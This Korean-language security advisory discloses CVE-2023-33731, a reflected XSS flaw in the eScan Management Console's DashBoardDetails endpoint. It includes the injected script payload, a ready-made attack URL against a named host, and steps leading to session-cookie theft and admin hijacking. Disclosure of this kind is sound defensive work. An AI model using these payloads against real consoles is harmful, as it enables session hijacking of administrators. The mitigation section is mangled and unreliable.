
Microworld Technologies에서 개발한 eScan Management Console(버전 14.0.1400.2281)에서 반사형 XSS(Reflected Cross-Site Scripting) 취약점이 발견되었습니다.
Microworld Technologies에서 개발한 eScan 관리 콘솔(버전 14.0.1400.2281)에서 반사형 크로스 사이트 스크립팅 (XSS) 취약점이 발견되었습니다. 이 취약점은 대시보드 상세 정보 (DashBoardDetails) 엔드포인트에 존재하며, 여러 쿼리 문자열 매개변수가 적절한 검증이나 출력 인코딩 없이 HTML 응답에 반영됩니다. 인증되지 않은 원격 공격자는 악성 URL을 구성하여 인증된 관리자가 이를 클릭하도록 유도할 수 있으며, 이로 인해 피해자의 브라우저 세션에서 임의의 JavaScript가 실행될 수 있습니다.
CVSS 3.1 벡터:
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
eScan 관리 콘솔은 대시보드 보기를 포함한 다양한 관리 작업을 처리하는 웹 인터페이스(ewconsole.dll)를 제공합니다. DashBoardDetails 엔드포인트는 여러 쿼리 문자열 매개변수(type, subtype, result, windowname, DisplayOSSelection)를 수신하며, 이 값들을 사용하여 서버 응답에서 HTML 콘텐츠를 동적으로 구성합니다.
서버 측 코드는 사용자 입력을 응답 본문에 포함하기 전에 검증(sanitize) 또는 HTML 인코딩하지 못합니다. 구체적으로 type 매개변수 값은 ", <, > 같은 특수 문자를 이스케이프하지 않고 HTML 속성 컨텍스트에 직접 반영됩니다. 이로 인해 공격자가 속성 컨텍스트를 벗어나 임의의 HTML/JavaScript 태그를 주입할 수 있습니다.
동일한 결함이 subtype 및 result 매개변수에도 존재합니다.
GET /ewconsole/ewconsole.dll/DashBoardDetails?type=<PAYLOAD>&subtype=<PAYLOAD>&result=<PAYLOAD>&windowname=usrmgmt&DisplayOSSelection=true
Host: cl.escanav.com
URL 인코딩된 페이로드 PS%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E는 다음과 같이 디코딩됩니다:
PS"><script>alert(document.cookie)</script>
| 조각 | 목적 |
|---|---|
PS" | 기존 HTML 속성 값을 닫습니다 ("가 속성을 종료) |
> | 주변 HTML 태그를 닫습니다 |
<script>alert(document.cookie)</script> | JavaScript를 실행하는 스크립트 블록을 주입하며, 여기서는 세션 쿠키를 탈취합니다 |
⚠️ 교육 및 공인된 보안 연구 목적으로만 사용하십시오.
1단계: 유효한 자격 증명으로 eScan 관리 콘솔에 로그인합니다.
2단계: 다음 구성된 URL을 직접 열거나 인증된 피해자에게 전달합니다:
https://cl.escanav.com/ewconsole/ewconsole.dll/DashBoardDetails?type=PS%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&subtype=13&result=3&windowname=usrmgmt&DisplayOSSelection=true
type 매개변수에 디코딩된 페이로드:
PS"><script>alert(document.cookie)</script>
3단계: 페이지가 로드되면 주입된 스크립트가 브라우저에서 실행됩니다. 피해자의 활성 세션 쿠키를 표시하는 경고 대화상자가 나타납니다.

4단계: 공격자는 세션 쿠키 값을 탈취하여 관리자의 세션을 하이재킹하고 관리 콘솔에 대한 전체 제어권을 얻습니다.

이 취약점을 성공적으로 악용하면 공격자는 다음을 수행할 수 있습니다:
< → <, > → >, " → ", ' → ').subtype 및 result는 숫자 값만 허용하고 다른 값은 거부해야 합니다.Content-Security-Policy HTTP 응답 헤더를 배포합니다.HttpOnly 속성을 설정하여 JavaScript가 접근하지 못하게 하면 XSS 취약점의 영향을 크게 줄일 수 있습니다.| 날짜 | 이벤트 |
|---|---|
| 2023-05-30 | Sahil Ojha가 취약점을 발견하고 문서화함 |
| 2023-05-30 | 공개 공개 / CVE 배정: CVE-2023-33731 |
Sahil Ojha
본 취약점은 광범위하게 배포된 보안 관리 소프트웨어의 보안 약점에 대한 인식을 높이기 위해 책임감 있게 연구되고 공개되었습니다. 여기에 제공된 모든 정보는 교육 및 방어적 보안 연구 목적으로만 사용됩니다.
| 필드 | 값 |
|---|
| CVE ID | CVE-2023-33731 |
| 취약점 유형 | 반사형 크로스 사이트 스크립팅 (XSS) |
| CWE | CWE-79 — 웹 페이지 생성 중 입력값의 부적절한 중화 (Improper Neutralization of Input During Web Page Generation) |
| 영향받는 제품 | Microworld Technologies eScan 관리 콘솔 (eScan Management Console) |
| 영향받는 버전 | 14.0.1400.2281 |
| 취약한 엔드포인트 | /ewconsole/ewconsole.dll/DashBoardDetails |
| 취약한 매개변수 | type, subtype, result |
| 공격 경로 | 네트워크 (피싱/사회공학을 통해 전달되는 악성 URL) |
| 인증 필요 여부 | 피해자는 인증되어 있어야 함; 공격자는 자격 증명이 필요 없음 |
| 테스트 환경 | Windows |
| 공개일 | 2023년 5월 30일 |
| 공급업체 홈페이지 | https://www.escanav.com |
| 지표 | 값 |
|---|
| 기본 점수 | 6.1 (Medium) |
| 공격 경로 | Network (네트워크) |
| 공격 복잡도 | Low (낮음) |
| 필요 권한 | None (없음) |
| 사용자 상호작용 | Required (필요) |
| 범위 | Changed (변경됨) |
| 기밀성 | Low (낮음) |
| 무결성 | Low (낮음) |
| 가용성 | None (없음) |